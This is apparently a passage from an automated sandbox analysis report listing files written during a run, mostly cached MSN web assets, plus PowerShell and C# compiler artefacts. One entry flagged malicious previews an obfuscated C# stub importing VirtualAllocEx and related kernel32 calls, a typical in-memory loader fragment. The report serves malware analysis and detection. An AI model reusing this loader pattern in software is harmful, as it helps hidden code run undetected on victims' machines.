Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OeSOO.Q.....Bi......&.h.!.h....x......$.M.\|.o...9z.^.d...Q...."...t.m...8.-........}o..q..@...O'.^9\|.).7]5H...'+M5.!......M^@.....?]..m::..V.C.1.8..@..........t..1.fD.3}..y.w..#b(.:....~....$M...&...HGM....$.,?.X.X~.7..`.3.S...8......"Y...v.?.....~5C.......d.CY;..!jh..aat~.k.'......r.).Dtp..9.s.:.../..~..x2....l...g.rB'R..L.^-...t.p.p..S.U..r.>.[.E.GJ...t.\|..J.*.:m......p2G.z...r.~.K.a`0.@.".F..]L.._\N.7....?..Lo:..j\|t......F.ke.#..x..."...B.#./.n(..9%..<\|/.....o...<n..;y.j.J6..G....`.3[c.....Q.G3.`86.>\..%.,.\.L-...p=...c..r.%.\|..... ..1f....w....$..2j..@x.....5.-.\};!s..C....5..'V6....&~[...I...j.]K....:....2.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBlBV0U[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	571
Entropy (8bit):	7.452339194977391
Encrypted:	false
SSDEEP:	12:6v/78/yGiVDhkiS2Ymk9jcKBErBJqUqwcNvfqfP7E7aMg:BiVKX2bk9jKF8xmfPIzg
MD5:	2A0F1D6E385401D3938B6D9EE552D24F
SHA1:	D55EA75A6965236BBAA06FE90284D7D7215466D5
SHA-256:	E4F4D7FEC3CB9F8D5EC45C601CB4574B332112C5F7BB6B2C7A6A50C228216311
SHA-512:	B07161A3033FBD3F96664ED3AB19A4F545166CF936E07D6846101C463C4620803148E77CB13CF2BBF7B1503D396EA5028F52A8E992E2561C6E0D0CA57ECE0AE2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlBV0U.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O...OSQ..?.=..Ay5..PH-80i$0.1&.....h...:8......@b.1qsqP.`..Hb...6.h[h....8.../...Or...s...s5{..`...xf......NR.5B....eq.1..R...<..M..F.....0..>........A.T....0lv.0'iBE.:i.o......5.X.F..B........O8.. ..+R.....\|...H8....=%.......`..+...["s7.t......_..K..{...>..h;.......H<.....@.J.` Z"...l.$.~n..(......z.^.B.-...{>,.;....Vr!>'.rh..L..T._.a...v.T.f..AA.f67../>.@k...[.E7H...i/....W......w5.4g.MP..&J..P..z.^....4.....{1..\.]*...n..D.8.#.....s&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	20391
Entropy (8bit):	5.735236856173149
Encrypted:	false
SSDEEP:	384:/meOS7T06ecpBbdEeTpXZtbP8vH5NQr8RNx6OSgcQNlpzDuj:/r9AuXT5vawQxBH6
MD5:	C6EC191DC18DC8207147E50195571105
SHA1:	61B5F5F283D6C54D390872BC5E3FCE21CD4524C7
SHA-256:	6FE96940ECC7F2D1FA86BD9214544782E7C96AA70490BD1D41AFB0A6341E8633
SHA-512:	33CADF0A954A4870751CBE81597AB9FB3578A746AE44B59158C40B27176D74EA7EFD1ED827E267294EACF39B730A175944C1F6E5E7460501909FF1AF88D9D294
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=9332ca5bbb784e66806f2afeb24098ad&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1613090822759
Preview:	.<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_cf7a91cc6d45ddc73c7463b46c317da8_9d5bad8d-7959-4a06-93d4-1a0347b83d8b-tuct71f558b_1613090827_1613090827_CIi3jgYQr4c_GNGjtOTj69Lb0QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE"},"tbsessionid":"v2_cf7a91cc6d45ddc73c7463b46c317da8_9d5bad8d-7959-4a06-93d4-1a0347b83d8b-tuct71f558b_1613090827_1613090827_CIi3jgYQr4c_GNGjtOTj69Lb0QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE","pageViewId":"9332ca5bbb784e66806f2afeb24098ad","RequestLevelBeaconUrls":[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"taboola","e":true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	434978
Entropy (8bit):	5.438742638724008
Encrypted:	false
SSDEEP:	3072:jJZJUXxx+wstaFPVs8gmQIqeWzDBRIUOmnWYXc/RKLc:jJZ4Ow6IqxzvIUfWV/R1
MD5:	890A7EBF8E8CC290D83B6185D4D982E8
SHA1:	B4E544E0DF9693872AB566FB2D3DD99016247F96
SHA-256:	F1512A2A1D73ABE86D4D7AE934AF5D74D266686095B2496A9D2BC20643333F0D
SHA-512:	99D0C853504F7AC0333F1B2CABF0A1DD47DC4B4A039C4E93AEBEB94E29A65B886AF1E17C1D7275D832D85BD3A564A7B198CF347312CF5A78D145BB46A8A3AD52
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210208_31257824;a:9332ca5b-bb78-4e66-806f-2afeb24098ad;cn:9;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 9, sn: neurope-prod-hp, dt: 2021-02-02T23:02:05.5135507Z, bt: 2021-02-08T21:20:57.5642255Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-01-12 22:59:27Z;xdmap:2021-02-12 00:45:40Z;axd:;f:msnallexpusers,muidflt27cf,bingcollabedge3cf,tokenblockosgc,starthz1cf,onetrustpoplive,msnapp4cf,1s-bing-news,vebudumu04302020,bbh20200521msn,strsl-spar-no,msnsports5cf,weather5cf,prong1aac,csmoney3cf,csmoney5cf,prg-gitconfigs-t11;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps":1000,"bds":7,&quo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\f489d89a-0e50-4a68-82ea-aa78359a514f[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	71729
Entropy (8bit):	7.978138681966507
Encrypted:	false
SSDEEP:	1536:m1xQuEXuHILYJ422E/mUx04VrG0tPZuL76T3:8QeoLYbR1VrG0tPMLq3
MD5:	CF11BAF2E1D8672BBE46055C034BAE56
SHA1:	7305B5298E7EFE304F11C4531A58D40ECD4EA99D
SHA-256:	2F7B151005B4E02B04116E540BE590E8C838B5CFE947358993DE63880520D10E
SHA-512:	646219C6D6FDDDDE4FD6B00B98C3EA10E33A182A39852011CAA2CBDADB2FAB4517950E3F6E972119435B4C18A823F6F1B38E74B6EC19F9ACF49D1EDB7096111D
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/2/99/84/174/f489d89a-0e50-4a68-82ea-aa78359a514f.jpg?v=9
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................J...........................!..1A."Qa.q..#2...B....$3R...%.Cb.4Scr.&st.....................................B........................!.1.."AQa..#q..2....B..$3b...4R.r...%CSc............?..6t....../..b....~.c.r....f.,......si.~NV...wKD..7...O0..).tm..c..:.]Ff.Q.....Fr.wT...X..;......dn...s.y....by..2G......`J!T.):....c.....~!.D.c).9B[.$7.......$xNF..jfLW"D.a..MR.^H..,u<.h..:. ...eV...%..AT...S ..`.o.Y.U...%}..I.G...w/....$........X.........SI#......".)..T^..f.0.+......W.....zT.]x..eIl.h.$..p.).,.1E...CCi....(3.ZY8S........x.....Q..)bw..u..4M...]..5..4....r."..(.T}.K.wf.w..0...nc....~.6.\.~P..$x....J.4/....!d. .D.s..9...fa..D.8x.....a..6....t`.T.u...9..IO.*..%.I...FQ'G..._./,`.....LF....+,L.B.d.$a}[A..O...>.D>.. dVc5~....5.@.....C..a..6..m...N........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	230026
Entropy (8bit):	5.150044456837813
Encrypted:	false
SSDEEP:	768:l3JqIWtk5N1cfkCHGd5btLkWUuSKQlqmPTZ1j5sIbUkjsyYAAA:l3JqIGk5Med5btLksSKkPnjNjh4A
MD5:	6AAA0F3074990A455B222A4D044E2346
SHA1:	6443AF82ED596527261B0F4367A67DD4D1BA855B
SHA-256:	1232E273F047113AB950CC141FC73D50640D2352B2ED16B89A1BAC01A80BEBEC
SHA-512:	EDE13CDE1DDEB45CD038042DCC6C1F75664EC259BC44100EB9C36361CFB657A7A661901DFEAD44DF6CEC555406A221970DF10F562AE222226546B7EFCE8E6E8D
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\log[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	35
Entropy (8bit):	3.081640248790488
Encrypted:	false
SSDEEP:	3:CUnl/RCXknEn:/wknEn
MD5:	349909CE1E0BC971D452284590236B09
SHA1:	ADFC01F8A9DE68B9B27E6F98A68737C162167066
SHA-256:	796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
SHA-512:	18115C1109E5F6B67954A5FF697E33C57F749EF877D51AA01A669A218B73B479CFE4A4942E65E3A9C3E28AE6D8A467D07D137D47ECE072881001CA5F5736B9CC
Malicious:	false
Preview:	GIF89a.............,........@..L..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\nrrV67478[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	88164
Entropy (8bit):	5.423101112677061
Encrypted:	false
SSDEEP:	1536:DVnCuukXGsQihGZFu94xdV2E4q35nJy0ukWaaCUFP+i/TX6Y+fj4/fhAaTZae:DQiYpdVGetuVLKY+fjwZ
MD5:	C2DC0FFE06279ECC59ACBC92A443FFD4
SHA1:	C271908D08B13E08BFD5106EE9F4E6487A3CDEC4
SHA-256:	51A34C46160A51FB0EAB510A83D06AA9F593C8BEB83099D066924EAC4E4160BC
SHA-512:	6B9EB80BD6BC121F4B8E23FC74FD21C81430EE10B39B1EDBDEFF29C04A3116EB12FC2CC633A5FF4C948C16FEF9CD258E0ED0743D3D9CB0EE78A253B6F5CBE05D
Malicious:	false
Preview:	var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]\|\|(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)\|\|""===n\|\|null===n\|\|(n=t,"[object Array]"!==Object.prototype.toString.call(n))\|\|!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	102879
Entropy (8bit):	5.311489377663803
Encrypted:	false
SSDEEP:	768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
MD5:	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
SHA1:	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
SHA-256:	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
SHA-512:	DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
Preview:	!function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur

C:\Users\user\AppData\Local\Temp\RESA74F.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.7034376836694154
Encrypted:	false
SSDEEP:	24:p+foADfHrhKdNNI+ycuZhNrakSNPNnq9qpRje9Ep:coOVKd31ulra3Xq9y
MD5:	998C94986ECAAE3C24681441CD8BFE45
SHA1:	434126C2FF9179FAABD10E340C56C9A49CE96025
SHA-256:	28F2CFBB98E2D00F9A9C1ED831DA07B743D1D80E59B1DC7CAA083047D4359E0C
SHA-512:	C3281E2CB3B3E7EF8C3D5DF78812EF54973E16F7107ABC6E31347696D041A721E21FFA0ADD24D38487117613D112A58B5A98EC113134E4BEF8CA1C68210BB727
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP.....................a.U;PoJ.T..........4.......C:\Users\user\AppData\Local\Temp\RESA74F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESB5E5.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.703795234224042
Encrypted:	false
SSDEEP:	24:bZf/SDfHShKdNNI+ycuZhNs7YakS97NPNnq9qpNje9Ep:bBQIKd31ulVa3pq9m
MD5:	AB519AF87718BC417590B29A3BF49501
SHA1:	0661056F8C2B30E345A7D3E9FA792F93606A92E5
SHA-256:	C594B31F302CAF70266C75CBB648701E238BDB47DC5B8528DB6883A5B13A7257
SHA-512:	B77DD0F92244F26D060B783607098C00A7195F210785A4BCF65039A340190EA1DBCC76ADA762C18935308C5435C6A4A5C259FB79D624F8C19942242604833FC5
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP................/I_.ET.A....a.zo..........4.......C:\Users\user\AppData\Local\Temp\RESB5E5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4e0fwnc.mdf.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sypsgydm.y3d.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1054167892741136
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGp7Yak7YnqqLp7NPN5Dlq5J:+RI+ycuZhNs7YakS97NPNnqX
MD5:	2F495FC845540941B988B5AF61C27A6F
SHA1:	723EED9CFC6DD8136CCE40DC9C354E0ECB96930C
SHA-256:	A532F6767531513C9B2E624885FE080678907D5098B0CE3DDCA9211F43493C48
SHA-512:	C06DED21293907B788D84C73A37D8165F83E6EB38936A11A4D93E0E60275A7523959DCF05EAB899421739598430D34A977278A3665AD565F645AAEE6DE90C8E8
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.u.o.1.u.o.w.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.u.o.1.u.o.w.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	413
Entropy (8bit):	4.95469485629364
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJAMRSRa+eNMjSSRrEMx9SRHq1DAfWZSEehEFQy:V/DTLDfuA9eg5rEMx8u25hZy
MD5:	66C992425F6FC8E496BCA0C59044EDFD
SHA1:	9900C115A66028CD4E43BD8C2D01401357FD7579
SHA-256:	85FEE59EDA69CF81416915A84F0B8F7D8980A3A582B5FA6CC27A8C1340838B6C
SHA-512:	D674884748328A261D3CB4298F2EB63B37A77182869C5E3B462FAB917631FC1A6BB9B266CAD4E627F68C3016A2EEADCD508FDDBAF818E2F12E51B97325D9406D
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class iteocetkyp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint hmli,uint odfa);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr cieceahsrf,IntPtr qipockeo,uint fmaounwoa,uint hdhq,uint fssner);.. }..}.

C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.2370857887858415
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fiex0zxs7+AEszIwkn23fieDH:p37Lvkmb6KRfrx0WZEifrb
MD5:	4A59EB52D50B954E4FE3BE14445492A0
SHA1:	F8F9114A60651B4A0325E34FF910EF0224EAD7BE
SHA-256:	7139F18B01C70D821C109C234786DC65A05048BB280F6A23E6A631A10217EC36
SHA-512:	B5ADB2342DFEB76AD6110B6FE53BD3CA8AD776FDA288D1A5449EC33C3509F8E14CD5462F30D779750A108334BD65DAC0FF7C728005F2C06EC95AD52DD562BCB7
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.0.cs"

C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.626671584071755
Encrypted:	false
SSDEEP:	24:etGSKM+WEei8MT38s2EGx3LddWC0PtkZfFoABuw7I+ycuZhNs7YakS97NPNnq:6E7qMTMpEGx7jWCdJOAB1ulVa3pq
MD5:	99F2A442D41624A35E6F800551EDBA6C
SHA1:	074DE8D656FB795415D78B38CFD9115E9A4A139D
SHA-256:	82B67D00BF43B351B87938626403FB337195BA44EEDC2C36D830426D4DABD012
SHA-512:	93EEB496B4C838E3BED292D23355C49EC6D147B37F819CB03D8273267345AEA3EADB2D2937156EEDDF1FC97C2E4D6F0AC5E38AE885324FE3B516660A39AC97F7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y.%`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............&.......................".............. =............ O............ W.....P ......f.........l.....q.....v...........................f.!...f...!.f.&...f.......+.....4.9.....=.......O.......W.......................................&..........<Module>.huo1uow1.dll.iteocetkyp.W3

C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0969017830418024
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZak7YnqqNPN5Dlq5J:+RI+ycuZhNrakSNPNnqX
MD5:	8118B0F7E0F361E1553B506F4ACEB854
SHA1:	EF1069A50767BA32613DE0441429E9F911924027
